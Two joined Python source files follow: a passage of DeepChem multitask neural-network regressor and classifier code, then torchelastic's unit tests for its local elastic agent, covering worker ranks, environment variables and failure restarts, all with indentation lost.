Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
"""
super(TensorGraphMultiTaskRegressor, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * (n_layers + 1)
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * (n_layers + 1)
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, 1),
in_layers=[
Dense(
in_layers=[prev_layer],
out_channels=n_tasks,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer,
stddev=weight_init_stddevs[-1]),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_init_consts[-1]))
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, 1))
weights = Weights(shape=(None, n_tasks))
loss = L2Loss(in_layers=[labels, output])
weighted_loss = WeightedError(in_layers=[loss, weights])
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
class TensorGraphMultiTaskFitTransformRegressor(TensorGraphMultiTaskRegressor):
"""Implements a TensorGraphMultiTaskRegressor that performs on-the-fly transformation during fit/predict.
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
fit_transformers=[],
n_evals=1,
batch_size=50,
**kwargs):
"""Create a TensorGraphMultiTaskFitTransformRegressor.
In addition to the following arguments, this class also accepts all the keywork arguments
from TensorGraphMultiTaskRegressor.
Parameters
----------
n_tasks: int
number of tasks
n_features: list or int
number of features
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
Number of evalations per example at predict time
"""
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
super(TensorGraphMultiTaskFitTransformRegressor, self).__init__(
n_tasks, n_features, batch_size=batch_size, **kwargs)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
if not predict:
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_on_generator(self, generator, transformers=[], outputs=None):
def transform_generator():
for feed_dict in generator:
X = feed_dict[self.features[0]]
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
feed_dict[self.features[0]] = X_t
yield feed_dict
return super(TensorGraphMultiTaskFitTransformRegressor,
self).predict_on_generator(transform_generator(), transformers,
outputs)
class TensorflowMultiTaskClassifier(TensorflowClassifier):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskClassifier is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
n_features = self.n_features
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = model_ops.multitask_logits(layer, self.n_tasks)
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = to_one_hot(y_b[:, task])
else:
# Dummy placeholders
orig_dict["labels_%d" %
task] = np.squeeze(to_one_hot(np.zeros((self.batch_size,))))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
class TensorflowMultiTaskRegressor(TensorflowRegressor):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskRegressor is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
n_features = self.n_features
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = []
for task in range(self.n_tasks):
output.append(
tf.squeeze(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, 1],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(value=bias_init_consts[i], shape=[1
]))))
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = y_b[:, task]
else:
# Dummy placeholders
orig_dict["labels_%d" % task] = np.squeeze(np.zeros((self.batch_size,)))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
class TensorflowMultiTaskFitTransformRegressor(TensorflowMultiTaskRegressor):
"""Implements a TensorflowMultiTaskRegressor that performs on-the-fly transformation during fit/predict
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
logdir=None,
layer_sizes=[1000],
weight_init_stddevs=[.02],
bias_init_consts=[1.],
penalty=0.0,
penalty_type="l2",
dropouts=[0.5],
learning_rate=0.002,
momentum=.8,
optimizer="adam",
batch_size=50,
fit_transformers=[],
n_evals=1,
verbose=True,
seed=None,
**kwargs):
"""Initialize TensorflowMultiTaskFitTransformRegressor
Parameters
----------
n_tasks: int
Number of tasks
n_features: list or int
Number of features.
logdir: str
Location to save data
layer_sizes: list
List of layer sizes.
weight_init_stddevs: list
List of standard deviations for weights (sampled from zero-mean
gaussians). One for each layer.
bias_init_consts: list
List of bias initializations. One for each layer.
penalty: float
Amount of penalty (l2 or l1 applied)
penalty_type: str
Either "l2" or "l1"
dropouts: list
List of dropout amounts. One for each layer.
learning_rate: float
Learning rate for model.
momentum: float
Momentum. Only applied if optimizer=="momentum"
optimizer: str
Type of optimizer applied.
batch_size: int
Size of minibatches for training.
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
Number of evalations per example at predict time
verbose: True
Perform logging.
seed: int
If not none, is used as random seed for tensorflow.
"""
warnings.warn("TensorflowMultiTaskFitTransformRegressor "
"is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
TensorflowGraphModel.__init__(
self,
n_tasks,
n_features,
logdir=logdir,
layer_sizes=layer_sizes,
weight_init_stddevs=weight_init_stddevs,
bias_init_consts=bias_init_consts,
penalty=penalty,
penalty_type=penalty_type,
dropouts=dropouts,
learning_rate=learning_rate,
momentum=momentum,
optimizer=optimizer,
batch_size=batch_size,
pad_batches=False,
verbose=verbose,
seed=seed,
**kwargs)
def fit(self,
dataset,
nb_epoch=10,
max_checkpoints_to_keep=5,
log_every_N_batches=50,
checkpoint_interval=10,
**kwargs):
"""Perform fit transformations on each minibatch. Fit the model.
Parameters
----------
dataset: dc.data.Dataset
Dataset object holding training data
nb_epoch: 10
Number of training epochs.
max_checkpoints_to_keep: int
Maximum number of checkpoints to keep; older checkpoints will be deleted.
log_every_N_batches: int
Report every N batches. Useful for training on very large datasets,
where epochs can take long time to finish.
checkpoint_interval: int
Frequency at which to write checkpoints, measured in epochs
Raises
------
AssertionError
If model is not in training mode.
"""
############################################################## TIMING
time1 = time.time()
############################################################## TIMING
log("Training for %d epochs" % nb_epoch, self.verbose)
with self.train_graph.graph.as_default():
train_op = self.get_training_op(self.train_graph.graph,
self.train_graph.loss)
with self._get_shared_session(train=True) as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=max_checkpoints_to_keep)
# Save an initial checkpoint.
saver.save(sess, self._save_path, global_step=0)
# Define the code that runs on a separate thread to feed data into the queue.
def enqueue(sess, dataset, nb_epoch, epoch_end_indices):
index = 0
for epoch in range(nb_epoch):
for X_b, y_b, w_b, ids_b in dataset.iterbatches(
self.batch_size, pad_batches=self.pad_batches):
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict = self.construct_feed_dict(X_b, y_b, w_b, ids_b)
sess.run(self.train_graph.graph.enqueue, feed_dict=feed_dict)
index += 1
epoch_end_indices.append(index)
sess.run(self.train_graph.graph.queue.close())
epoch_end_indices = []
enqueue_thread = threading.Thread(
target=enqueue, args=[sess, dataset, nb_epoch, epoch_end_indices])
enqueue_thread.daemon = True
enqueue_thread.start()
# Main training loop.
try:
epoch = 0
index = 0
index_in_epoch = 0
avg_loss = 0.0
while True:
if index_in_epoch % log_every_N_batches == 0:
log("On batch %d" % index_in_epoch, self.verbose)
# Run training op.
fetches = self.train_graph.output + [
train_op, self.train_graph.loss
]
fetched_values = sess.run(fetches)
loss = fetched_values[-1]
avg_loss += loss
index += 1
index_in_epoch += 1
if len(epoch_end_indices) > 0 and index >= epoch_end_indices[0]:
# We have reached the end of an epoch.
if epoch % checkpoint_interval == checkpoint_interval - 1:
saver.save(sess, self._save_path, global_step=epoch)
avg_loss = float(avg_loss) / index_in_epoch
log('Ending epoch %d: Average loss %g' % (epoch, avg_loss),
self.verbose)
epoch += 1
index_in_epoch = 0
avg_loss = 0.0
del epoch_end_indices[0]
except tf.errors.OutOfRangeError:
# We have reached the end of the data.
pass
# Always save a final checkpoint when complete.
saver.save(sess, self._save_path, global_step=epoch + 1)
############################################################## TIMING
time2 = time.time()
print("TIMING: model fitting took %0.3f s" % (time2 - time1), self.verbose)
############################################################## TIMING
def predict_on_batch(self, X):
"""Return model output for the provided input. Each example is evaluated
self.n_evals times.
Restore(checkpoint) must have previously been called on this object.
Args:
dataset: dc.data.Dataset object.
Returns:
Tuple of three numpy arrays with shape n_examples x n_tasks (x ...):
output: Model outputs.
labels: True labels.
weights: Example weights.
Note that the output and labels arrays may be more than 2D, e.g. for
classifier models that return class probabilities.
Raises:
AssertionError: If model is not in evaluation mode.
ValueError: If output and labels are not both 3D or both 2D.
"""
X_evals = []
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
X_evals.append(X_t)
len_unpadded = len(X_t)
if self.pad_batches:
for i in range(self.n_evals):
X_evals[i] = pad_features(self.batch_size, X_evals[i])
if not self._restored_model:
self.restore()
with self.eval_graph.graph.as_default():
# run eval data through the model
n_tasks = self.n_tasks
outputs = []
with self._get_shared_session(train=False).as_default():
n_samples = len(X_evals[0])
for i in range(self.n_evals):
output = []
feed_dict = self.construct_feed_dict(X_evals[i])
data = self._get_shared_session(train=False).run(
self.eval_graph.output, feed_dict=feed_dict)
batch_outputs = np.asarray(data[:n_tasks], dtype=float)
# reshape to batch_size x n_tasks x ...
if batch_outputs.ndim == 3:
batch_outputs = batch_outputs.transpose((1, 0, 2))
elif batch_outputs.ndim == 2:
batch_outputs = batch_outputs.transpose((1, 0))
# Handle edge case when batch-size is 1.
elif batch_outputs.ndim == 1:
n_samples = len(X)
batch_outputs = batch_outputs.reshape((n_samples, n_tasks))
else:
raise ValueError('Unrecognized rank combination for output: %s' %
(batch_outputs.shape))
# Prune away any padding that was added
batch_outputs = batch_outputs[:n_samples]
output.append(batch_outputs)
outputs.append(np.squeeze(np.concatenate(output)))
outputs = np.mean(np.array(outputs), axis=0)
outputs = np.copy(outputs)
# Handle case of 0-dimensional scalar output
if len(outputs.shape) > 0:
return outputs[:len_unpadded]
else:
outputs = np.reshape(outputs, (1,))
return outputs
|
local_elastic_agent_test.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing
import os
import time
import unittest
import uuid
from unittest.mock import patch
import torch
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torchelastic.rendezvous.registry as rdzv_registry
from torch.distributed.rpc.backend_registry import BackendType
from torch.multiprocessing import ProcessRaisedException
from torchelastic.agent.server.api import (
WorkerGroupFailureException,
WorkerSpec,
WorkerState,
)
from torchelastic.agent.server.local_elastic_agent import LocalElasticAgent
from torchelastic.rendezvous import RendezvousParameters
from torchelastic.rendezvous.etcd_server import EtcdServer
from torchelastic.test.test_utils import is_asan_or_tsan, is_tsan
def _happy_function():
return
def _sad_function():
raise RuntimeError("sad because i throw")
def _fatal_signal_function(expected_error_index: int, sig: int):
rank = int(os.environ["RANK"])
if rank == expected_error_index:
os.kill(os.getpid(), sig)
def _bipolar_function():
rank = int(os.environ["RANK"])
if rank % 2 == 0:
_happy_function()
else:
_sad_function()
def _distributed_sum(wait):
rank = int(os.environ["RANK"])
world_size = int(os.environ["WORLD_SIZE"])
dist.init_process_group(backend="gloo")
t = torch.tensor(rank)
time.sleep(wait)
dist.all_reduce(t, op=dist.reduce_op.SUM)
expected_sum = sum(range(world_size))
actual = t.item()
if expected_sum != actual:
raise RuntimeError(f"Expected rank sum {expected_sum}, got {actual}")
def _simulate_work(wait):
time.sleep(wait)
rank = int(os.environ["RANK"])
return rank
def _check_rank_assignment():
group_rank = int(os.environ["GROUP_RANK"])
rank = int(os.environ["RANK"])
world_size = int(os.environ["WORLD_SIZE"])
role_rank = int(os.environ["ROLE_RANK"])
role_world_size = int(os.environ["ROLE_WORLD_SIZE"])
return (group_rank, rank, world_size, role_rank, role_world_size)
def _get_env_var(env_var: str):
return os.environ[env_var]
def echo(msg):
return msg
def _return_rank_times(a):
return int(os.environ["RANK"]) * a
def _check_env_function():
# just check these env vars exist, os.environ[...] will naturally throw
# if the variable does not exist
os.environ["RANK"]
os.environ["LOCAL_RANK"]
os.environ["ROLE_RANK"]
os.environ["ROLE_NAME"]
os.environ["GROUP_RANK"]
os.environ["LOCAL_WORLD_SIZE"]
os.environ["ROLE_WORLD_SIZE"]
os.environ["WORLD_SIZE"]
os.environ["MASTER_ADDR"]
os.environ["MASTER_PORT"]
os.environ["TORCHELASTIC_RESTART_COUNT"]
os.environ["TORCHELASTIC_MAX_RESTARTS"]
os.environ["TORCHELASTIC_RUN_ID"]
def _run_agent(
run_id,
etcd_host,
etcd_port,
min_size,
max_size,
func_to_run,
args,
local_world_size=8,
role="test_trainer",
output_dict=None,
agent_barrier_timeout=300,
):
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint=f"{etcd_host}:{etcd_port}",
run_id=run_id,
min_nodes=min_size,
max_nodes=max_size,
)
rdzv_handler = rdzv_registry.get_rendezvous_handler(rdzv_params)
spec = WorkerSpec(
role=role,
local_world_size=local_world_size,
fn=func_to_run,
args=args,
rdzv_handler=rdzv_handler,
max_restarts=2,
monitor_interval=1,
)
agent = LocalElasticAgent(
spec, start_method="fork", exit_barrier_timeout=agent_barrier_timeout
)
res = agent.run()
if output_dict is not None:
key = str(uuid.uuid4().int)
output_dict[key] = (role, res)
class LocalElasticAgentTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_happy_function(self):
spec = self._get_worker_spec(fn=_happy_function)
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
def _get_worker_spec(
self,
fn=None,
cmd=None,
args=(),
max_restarts=1,
num_agents=1,
monitor_interval=0.1,
local_world_size=8,
):
run_id = str(uuid.uuid4().int)
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint=f"{self._etcd_server.get_endpoint()}",
run_id=run_id,
min_nodes=num_agents,
max_nodes=num_agents,
)
rdzv_handler = rdzv_registry.get_rendezvous_handler(rdzv_params)
spec = WorkerSpec(
role="test_trainer",
local_world_size=local_world_size,
fn=fn,
cmd=cmd,
args=args,
rdzv_handler=rdzv_handler,
max_restarts=max_restarts,
monitor_interval=monitor_interval,
)
return spec
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_check_role_name(self):
spec = self._get_worker_spec(fn=_get_env_var, args=("ROLE_NAME",))
agent = LocalElasticAgent(spec, start_method="fork")
res = agent.run()
for role_name in res.values():
self.assertEquals(spec.role, role_name)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_distributed_sum(self):
spec = self._get_worker_spec(fn=_distributed_sum, args=(0,))
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
class RoleConfig:
__slots__ = ["role", "workers", "num_agents", "workers_num", "role_size"]
def __init__(
self, role: str, workers=None, num_agents: int = 0, workers_num: int = 0
):
self.role = role
self.workers = workers
if workers_num != 0 and num_agents != 0:
self.workers = [workers_num] * num_agents
self.role_size = sum(self.workers)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_correct_rank_assignment_heterogeneous(self):
roles_config = [
self.RoleConfig("trainer", workers=[1, 2, 3, 4]),
self.RoleConfig("ps", workers=[5, 2]),
# split configuration to run the last one on the main process
self.RoleConfig("master", workers=[8]),
]
self.run_configuration(roles_config, 25)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_correct_rank_assignment_homogeneous(self):
num_workers = 4
roles_config = [
self.RoleConfig("trainer", num_agents=4, workers_num=num_workers),
self.RoleConfig("ps", num_agents=2, workers_num=num_workers),
# split configuration to run the last one on the main process
self.RoleConfig("master", num_agents=1, workers_num=num_workers),
]
self.run_configuration(roles_config, 28)
def run_configuration(self, roles_config, expected_world_size):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = sum(len(cfg.workers) for cfg in roles_config)
run_id = str(uuid.uuid4().int)
procs = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
default_args = (run_id, host, port, nnodes, nnodes, _check_rank_assignment, ())
for ind in range(len(roles_config) - 1):
config = roles_config[ind]
for num_workers in config.workers:
p = multiprocessing.Process(
target=_run_agent,
args=(*default_args, num_workers, config.role, return_dict),
)
procs.append(p)
p.start()
# run one on the main process for debugging
config = roles_config[len(roles_config) - 1]
_run_agent(*default_args, config.workers[0], config.role, return_dict)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
role_info_dict = {role_info.role: role_info for role_info in roles_config}
self.verify_rank_consistency(return_dict, role_info_dict, expected_world_size)
def verify_rank_consistency(self, return_dict, role_info_dict, expected_world_size):
role_ranks = {}
global_ranks = []
grouped_ranks = {}
for role, res in return_dict.values():
for (
group_rank,
rank,
world_size,
role_rank,
role_world_size,
) in res.values():
role_info_config = role_info_dict[role]
self.assertEqual(expected_world_size, world_size)
self.assertEqual(role_info_config.role_size, role_world_size)
if group_rank not in grouped_ranks:
grouped_ranks[group_rank] = []
grouped_ranks[group_rank].append((rank, role_rank))
global_ranks.append(rank)
if role not in role_ranks:
role_ranks[role] = []
role_ranks[role].append(role_rank)
global_ranks = sorted(global_ranks)
self.assertEqual(list(range(0, expected_world_size)), global_ranks)
for role, role_config_info in role_info_dict.items():
self.assertEqual(
list(range(0, role_config_info.role_size)), sorted(role_ranks[role])
)
# Make sure that each agent assignes consecutive ranks to workes
# The first argument is the global_rank and the second argument
# is role_rank
for ranks_lst in grouped_ranks.values():
self.verify_ranks_sequential(ranks_lst, 0)
self.verify_ranks_sequential(ranks_lst, 1)
def verify_ranks_sequential(self, ranks_pairs, rank_idx):
ranks = sorted(rank_pair[rank_idx] for rank_pair in ranks_pairs)
start_rank, end_rank = ranks[0], ranks[-1]
self.assertEqual(list(range(start_rank, end_rank + 1)), ranks)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_distributed_sum_heterogenous(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 4
run_id = str(uuid.uuid4().int)
procs = []
default_args = (run_id, host, port, nnodes, nnodes, _distributed_sum, (0,))
for ind in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent, args=(*default_args, ind + 1)
)
procs.append(p)
p.start()
# run one on the main process for debugging
_run_agent(*default_args, 8)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_sad_function(self):
spec = self._get_worker_spec(fn=_sad_function, max_restarts=2)
agent = LocalElasticAgent(spec, start_method="fork")
with self.assertRaises(WorkerGroupFailureException) as cm:
agent.run()
excs = cm.exception.get_worker_exceptions()
self.assertEqual(spec.local_world_size, len(excs))
for e in excs.values():
self.assertTrue(isinstance(e, ProcessRaisedException))
self.assertEqual(WorkerState.FAILED, agent.get_worker_group().state)
self.assertEqual(0, agent._remaining_restarts)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_bipolar_function(self):
spec = self._get_worker_spec(fn=_bipolar_function, max_restarts=2)
agent = LocalElasticAgent(spec, start_method="fork")
with self.assertRaises(WorkerGroupFailureException):
agent.run()
self.assertEqual(WorkerState.FAILED, agent.get_worker_group().state)
self.assertEqual(0, agent._remaining_restarts)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_check_env_function(self):
spec = self._get_worker_spec(fn=_check_env_function, max_restarts=2)
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_check_run_id(self):
def return_run_id():
return os.environ["TORCHELASTIC_RUN_ID"]
spec = self._get_worker_spec(fn=return_run_id, max_restarts=0)
agent = LocalElasticAgent(spec, start_method="fork")
ret = agent.run()
for i in range(spec.local_world_size):
self.assertEqual(spec.rdzv_handler.get_run_id(), ret[i])
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_get_worker_return_values(self):
spec = self._get_worker_spec(fn=_return_rank_times, args=(2,))
agent = LocalElasticAgent(spec, start_method="fork")
ret_vals = agent.run()
self.assertEqual(spec.local_world_size, len(ret_vals))
for i in range(spec.local_world_size):
self.assertEqual(i * 2, ret_vals[i])
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_double_agent_happy(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
for _ in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,)),
)
procs.append(p)
p.start()
# run one on the main process for debugging
_run_agent(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,))
for i in range(nnodes - 1):
p = procs[i]
p.join()
